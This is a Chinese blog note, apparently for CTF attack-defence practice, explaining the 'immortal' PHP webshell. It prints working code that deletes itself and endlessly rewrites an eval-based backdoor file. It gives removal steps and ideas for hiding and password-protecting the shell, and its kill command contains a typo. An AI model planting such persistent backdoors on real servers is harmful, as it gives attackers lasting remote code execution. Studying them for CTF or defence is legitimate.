不死马

不死马感觉挺有用的，先了解了解，早晚会用到

先来了解下不死马“不死”的原理

不死马与普通一句话的区别在于，不死马本身并不是用来连接的，而是创建一个不断生成另一个一句话的进程，我们需要连接的是另一个被创建出来的一句话木马文件

来看一个普通的不死马

<?php
set_time_limit(0);                          //用来让这个php文件能永久执行，否则会有超时时间
ignore_user_abort(1);                       //让客户端只连接一次就能一直运行，否则客户端关闭页面就会停止
unlink(__FILE__);                           //把自身文件删除
while (1) {
$content = '<?php @eval($_POST["cmd"]); ?>';//设置一句话
file_put_contents("shell.php", $content);   //将一句话写入到文件中
usleep(10000);                              //间隔时间
}
?>

这里的usleep的单位很离谱

现在上虚拟机里试试

 写好后这边访问一下，可以看到1.php不见了，shell.php被创建了，而且删不掉

 那该怎么删呢

最方便的应该是这样吧：

 直接写个脚本删除同时创建相同名称文件夹(整完想起来直接用&&执行命令不是更快)

网页这边能够看到效果：

 但是这个进程依旧是存在的，在1.php这里能够看到它依然在不断尝试写马

网上用的命令是这样的：ps aux|grep www-data|awk '{print 2}'| xargs kill -9

杀死所有www的进程，但是不知道为什么用了之后还是不好使，最后重启了下apache好了：apache2 restart

也不知道php执行脚本执行到哪去了，在ps里没看到，可能是在这几个www 的里面

 就是不知道为什么杀进程不好使，待会再研究

到这里大概了解了普通的不死马原理以及一般的防护手段，下面就应该对它进行一些改造

首先就是把要写的一句话的文件名伪装起来，比如常用的有伪装成.config.php的

不加-a看不到，而且名字也能有些迷惑性，或者其他一些看起来比较有迷惑性的名称

然后是防止其他队搭顺风车的手段

比如这里在连接的时候需要加个?passwd=shell

这里顺带说一嘴md5，它是无法被还原出明文的，因为它是一种摘要算法

它会将任何长度的字符串通过计算后转化成固定长度的字符串，不管你的小电影有几百个T都一样(乐)

而验证的方式就是再计算一边，如果两个结果对上了那就通过了

不过即使是这种方式如果密码设置的太简单也经常会遭重

 看这第一位很大可能是对的

具体的可以看看这篇文章：https://blog.csdn.net/qq_35387940/article/details/129749096

然后应该就剩下一句话本身的变形了，这个跟不死马关系不大，就不在这写了